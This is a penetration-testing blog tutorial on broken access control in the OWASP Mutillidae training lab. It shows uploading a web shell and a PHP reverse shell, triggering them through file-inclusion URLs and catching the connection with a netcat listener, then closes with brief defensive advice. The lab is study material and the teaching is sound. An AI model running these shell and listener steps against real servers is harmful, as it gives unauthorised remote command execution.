A5: 2017 – Broken Access Control (Part 2)

With local file inclusion we use files that are already there on the web server. But what if we could execute some file that is not supposed to be there at all. Let’s take a look.

a5_9
In OWASP Mutillidae we have a section «Others» > «Unrestricted File upload» > «File upload». Let’s upload something with this form. I’ve uploaded a png-file with no problems because server doesn’t validate what are we uploading.

eat, now let’s upload something useful. There’s a whole class of scripts called «shell script». Main idea here is to break the logic of a web application to control it by yourself. Just google this term and you’ll see that there are dozens of shell scripts out there, plus you can craft your own. I’ll use this one . Simple, yet reliable. Let’s upload this file, and call it with this request:

http://192.168.130.131/mutillidae/index.php?page=/tmp/webshell.php

It works. It adds a simple web interface to run any command on remote server, browse directories, list files and so on.

a5_7.png

Ok, let’s look at something little more advanced. Let’s make web application connect to our rogue server so we could issue commands at anytime. Sort of a call back.

First we need a script. This class is call reverse-shell, because it gives us shell … well, in reverse. Let’s get one from here . We need to change it a little and then upload it, just like the one before. We have to change two variables:

$ip = '127.0.0.1';
$port = 1234;

$ip is an IP address of our rogue server and $port is its port. Now let’s set it up. In fact, we don’t need a whole server, we just need a listener to accept connections. The easiest way to do it is with netcat utility.

Netcat (or simply nc) is a legendary unix utility that was designed for network debugging and investigations, since it can produce almost any kind of network connections. And since there’s no real difference between debugging and pentest, we are going to use it here. I don’t use separate Linux machines if I can, so I run Linux utilites in Windows subsystem for Linux (heh, I’m a Windows guy with heavy background with Windows servers, exchange, TMG and stuff like that). To set up a listener we have to use this command:

nc -nlvp 1234

parameters here are n – numeric-only IP addresses, no DNS, l – listen mode, for inbound connects, v – verbose and p – port 1234. Just what we need.

Now let’s upload our script and call it with

http://192.168.130.131/mutillidae/index.php?page=/tmp/php-shell-local.php

Let’s switch back to our netcat windows. Voilà:

a5_8.png

Script successfully connected to our netcat listener and now we can run commands just as if we were right in front of server console.

Netcat is a versatile and formidable tool, use it with caution. Also check SANS nc cheat sheet by the way.

This is it for file inclusions, I hope you get the idea. You can go further and include files without uploading them, but calling them from remote servers. Be creative on this.

The red team is on fire, so what can the blue team do about it? Of course, use SAST or DAST but don’t count on them too much. This access control is a subject for manual testing mostly. Another important thing is a proper access matrix. Basically, you can deny everything by default, and then give access only to specific users or processes. It’s called also a concept of least privileges. It’s like firewall with default rule of “any to any deny” and specific rules for specific ports and protocols.

At some point all these OWASP Top 10 vulnerabilities begin to overlap. It’s hard sometimes to distinct injections from inclusions and data exposure from misconfiguration. But it’s not a big deal since you know how to discover and handle each of them.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s